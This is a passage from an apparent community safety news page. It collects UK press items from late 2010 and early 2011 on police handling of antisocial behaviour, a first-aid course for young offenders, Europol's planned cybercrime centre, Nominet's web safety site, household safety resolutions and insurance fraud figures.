Kim Langley, from Fareham in Hampshire, told the BBC she was disappointed by the police response when she reported verbal abuse and damage to her home. "They'd send somebody out - we normally got a PCSO [police community support officer] come round - and we'd give them all the details, they'd write it all down, off they'd go again. A couple of weeks later... we'd get a letter saying there was nothing they could do, after extensive inquiries, because there was no evidence for them to follow."

Crime Prevention Minister James Brokenshire said it was "not acceptable that those most in need either slip through the net or are plain ignored". "The technology exists to allow agencies to introduce a smart way of handling such complaints and a simple way of sharing information - they need to use it," he said. "It is essential those who raise the alarm and ask for help are listened to and their complaints acted upon promptly."

Repeat callers
 
Leicestershire Police was strongly criticised following the deaths of Ms Pilkington and her daughter, but Ch Insp Nick Glynn told the BBC that many improvements had been made since.

"One of the significant changes we have made is that we now record anti-social behaviour in exactly the same way as we do crime," he said. "So we make sure we pick up people who are repeat callers and make sure they don't slip through the net."

Ch Insp Glynn said Leicestershire's involvement in the project would help its good practice spread to other forces. But he said that in cases of "lower level antisocial behaviour", ordinary people could "take responsibility themselves" and reproach those causing trouble.

Home Secretary Theresa May has also called for communities to take action to help make antisocial behaviour "unusual, abnormal and something to stand up to".

(4th January 2011)


 

GANG MEMBERS TAUGHT FIRST AID FOR STAB WOUNDS
(The Guardian, dated 30th December 2010 author Amelia Hill)
www.guardian.co.uk

Rehabilitation course in Liverpool gives life-saving skills to young offenders involved in knife and gun crime.

Teaching young, violent criminals the first aid techniques that could save the lives of fellow gang members might seem a dangerous move but a new project doing exactly that is gaining the attention of youth offending teams across the country.

The brainchild of a group of medical students at Liverpool University, the course specialises in teaching teenagers already involved in knife and gun crime the skills to give pre-hospital care immediately after a penetrating injury.

The two-week Basics course is now a core part of Liverpool's Young Offenders Team's restorative justice programme. Youth offending experts in Nottinghamshire and medics in London have also expressed interest.

"The course changed my life," said Michael, 16, who was convicted of threatening a rival gang member with a blade earlier this year. "It makes you think, because you realise you can kill someone really easily with a knife. There's no safe place on the body to stab someone. I had a friend who was stabbed recently. I would have been a lot more help to him if I'd done this course when it happened. But it's good to know all this stuff in case I'm in that situation again," he added. "I've told my friends what I've learned here, so now they all know the basic first-aid techniques too."

World Health Organisation research showed that knives were used in almost four out of 10 killings of young people in the UK last year, more than any other weapon. The cost to the NHS of the combined injuries of gun and knife crime is more than £3m a year, according to the Trauma Audit Research Network.

In Merseyside alone, the tragic toll of teenage killings includes Rhys Jones, who was 11 when 18-year-old Sean Mercer shot him in the back in 2007. Three years earlier, Anthony Walker, 18, was murdered in a racially motivated attack with an ice pick by Michael Barton - brother of footballer Joey Barton - and his cousin, Paul Taylor.

Nick Rhead, a fifth-year medical student, co-devised the Liverpool YOT course after realising the majority of 11- to 16-year-old offenders attending his general first aid class had known someone who had been stabbed or shot - or had been the victim or had stabbed someone themselves.

"I realised we had a valuable opportunity to make genuine contact with young people involved in extremely high-risk behaviours, who had to engage with us because it was part of their court order," said Rhead who, along with his fellow medical students, teaches the course on a voluntary basis.

"Talking to them, we realised knife violence isn't just the preserve of drug dealers and gangs involved in territory disputes. For young people today, it almost seems like a game. It's part of everyday gang culture to stab someone in the back of the knee or the arm. They don't realise they can kill someone like that. At the same time, they are a reservoir of potential healthcare providers."

The course, which all newly convicted violent and non-violent young offenders must attend, teaches the basic principles of haemorrhage management, with cardiopulmonary resuscitation and the recovery position in two 90-minute sessions.

The course has the full support of Steve Boote, senior practitioner in restorative justice at the YOT. "Knife and gun crime is so common nowadays that it seemed common sense to teach every young offender the basics of specialised first aid," he said.

"The beauty of this project is that you have someone from the YOT sitting in to make sure the young people engage," he added. "I have the power to rule them as having breached their court order if they refuse to take part, and return them to court."

A controversial aspect of the scheme is that the medical students and YOT team workers do not try to dissuade the young people from violent behaviour.

"We don't want to say they should never stab people because that's not what we're about," said Rhead. "We hope the course will speak for itself and change their behaviour but we don't preach to them. They know it's wrong. We're just there to reduce mortality and make sure the consequences of any violence are limited.

"It's unlikely to increase incidents by giving the children the idea that they can cope with the consequences of violence," he added. "These are young people already engaging in high-risk behaviour."

Luke, an 18-year-old former offender who attended the course earlier this year, agreed. "After doing this project I have stopped going around with those sorts of people because I realised that the consequences of getting mixed up in this sort of thing are too serious. I've persuaded a couple of my friends to come with me.

"Another thing I realised was how bad knife wounds can make you look for ever. Even if you later decide to leave all that sort of thing behind you, if you've got a massive knife scar on your face, it would really put anyone off employing you. It made me think," he added.

(4th January 2011)


 

EUROPEAN CRIME CENTRE PROPOSED IN FIGHT AGAINST CYBER CRIME
(Courtesy of : Computer Active, dated 20th December 2010 author Dinah Greek)
www.computeractive.co.uk

European Police Office want web users to get involved and report internet crimes

Millions of internet users across the EU could be asked to join in the fight against cyber crime.

Rob Wainwright, director of Europol (the European Police Office), briefed the House of Lords EU sub-committee on Home Affairs last week on plans to introduce a European cyber crime centre.

This would include a central online reporting function, through which members of the public could report cybercrimes.

He told peers that directly involving web users in helping to net cyber crime gangs would have a two-fold benefit. It would "empower citizens not only to look out for themselves but to report criminal activity".

The idea of involving the public is not new and has been used in the US for a number of years. For the past 10 years the public have been able to report cyber crimes to the Internet Crime Complaint Center (IC3); a joint venture between the National White Collar Crime Center and the FBI.

Mr Wainwright said: "For the first time the EU will have a comprehensive overview of reported cyber crime from within its own borders and this could even include, in the future, a component of direct engagement with the public."

The Europol system could potentially go further than the IC3. Plans put forward mean it wouldn't be restricted to victims of cyber crime.

Anyone who had information would be able to report this. However, the plans are still in the very early stages. Although it is hoped that the European cyber crime centre can be set up by 2014, much depends on whether funding can be secured.

Further information

European Law Enforcement Agency: www.europol.europa.eu/

(3rd January 2011)


 

WEB SAFETY SITE LAUNCHES
(Courtesy of : Computer Active, dated November 2010 author Dinah Greek)
www.computeractive.co.uk

Nominet has launched an educational website to help people stay safe online and drive business.

www.knowthenet.org.uk

The not-for-profit organisation responsible for the .uk domain names said the Knowthenet.org.uk site will provide "practical" advice, information and video content for consumers and business users.

For example, the site will carry information on security scares, scams and news of the latest dangerous software. Nominet said research it had carried out showed online safety in all areas was an area of major concern for many people.

"In September this year, there were 31,000 Google searches for 'Internet safety', 60,500 searches for 'cyber bullying' and 34,000 searches for 'computer virus'," Nominet said.

"Security risks are also growing, with almost 80,000 people falling victim to internet fraud in the first nine months of 2010 - a 10 per cent jump on last year."

The organisation also said that the library of material on the site covering online safety included a range of topics from password choice and phishing scams to privacy settings on social networks.

Phil Kingsland, Nominet's marketing and communications director, said: "Information is only a click away on the internet. The challenge is that often people don't always know what to trust, or where to go.

"Free, impartial advice is hard to come by. We've launched the Knowthenet.org.uk site to bridge this knowledge gap, addressing concerns and offering impartial, useful advice which gives people the confidence and know-how to do more online."

The site will also point users to other trusted internet resources such as GetSafeOnline and Identitytheft.org.uk for more detailed information.

Nominet said the front page of the website will be updated several times a week with short posts that will provide practical advice for consumers and businesses as media stories break and major new online developments occur. It said people can also follow the site via updates on Twitter, comment on stories and suggest additional topics.

Further information

Get Safe Online : www.getsafeonline.org/

Identity theft prevention : www.identitytheft.org.uk/

Register of UK domain names (websites) : www.nominet.org.uk/

(3rd January 2011)


 

HAPPY NEW YEAR - SOME SUGGESTED RESOLUTIONS

- Test your smoke alarm, replace old batteries, test the unit regularly.
- Always ensure that patio doors are locked correctly.
- Keep computer security software up to date.
- Regularly check bank and credit card statements for fraudulent transactions.
- Shred unwanted bank, credit card and utility statements.
- Check that the tread on your car tyres meets the legal depth.
- Don't respond to unsolicited e-mails from senders you don't recognise (SPAM).
- Don't respond to e-mails from "banks". If they are raising an issue on your account telephone them on a known number. Avoid Phishing.
- If you are away for the night or more, give the impression that you are in by setting up a light controlled by a timer.
- Why not at least think about having that free household security check by the Met Police Safer Neighbourhood Team !

(1st January 2011)


INSURANCE FRAUD COSTS £2.3 MILLION EVERY DAY
(Sky News, dated 29th December 2010 author Michael Burgess)
www.news.sky.com

Insurance companies are uncovering an average of 335 fraudulent claims every day, says a report.

According to the Association of British Insurers, the claims, which are being detected with increasingly sophisticated techniques, are costing £2.3m every day.

The most common type of insurance fraud is home insurance, says the report, with 170 bogus claims made each day.

Fraudulent home insurance claims usually involve people claiming for alleged accidental damage to carpets or furniture - such as spilled red wine or coffee - only for insurers to find the damage was done deliberately.

The second most common type of insurance fraud was motor insurance, with 108 fraudulent claims made each day, costing approximately £1.1m.

Speaking to Sky News, Malcolm Tarling, of the Association of British Insurers, said: "We've had people who have travelled overseas and claimed for stolen cameras and items they've never had."

He said some people also "spill paint and coffee on carpets and then claimed for the complete refurbishment of the home".

One claimant crashed his car during a race at the Nuerburgring race track in Germany, but shipped it back to the UK to claim it was damaged at the side of the road in Britain.

Another policy holder alleged he had sustained a head injury after tripping over a loose paving stone, only for it to emerge he had been hit by a baseball bat during a fight.

Nick Starling, also of the Association of British Insurers, said: "Insurance cheats do not prosper - they can expect to get caught, face problems getting future insurance and risk getting a criminal record."

He added: "The majority of customers are honest and rightly object to subsidising the cheats. Insurance fraud adds an extra £44 to the average UK household's annual insurance bill.

"This is why 2011 will see insurers intensify their war against the cheats to protect their honest customers."

(1st January 2011)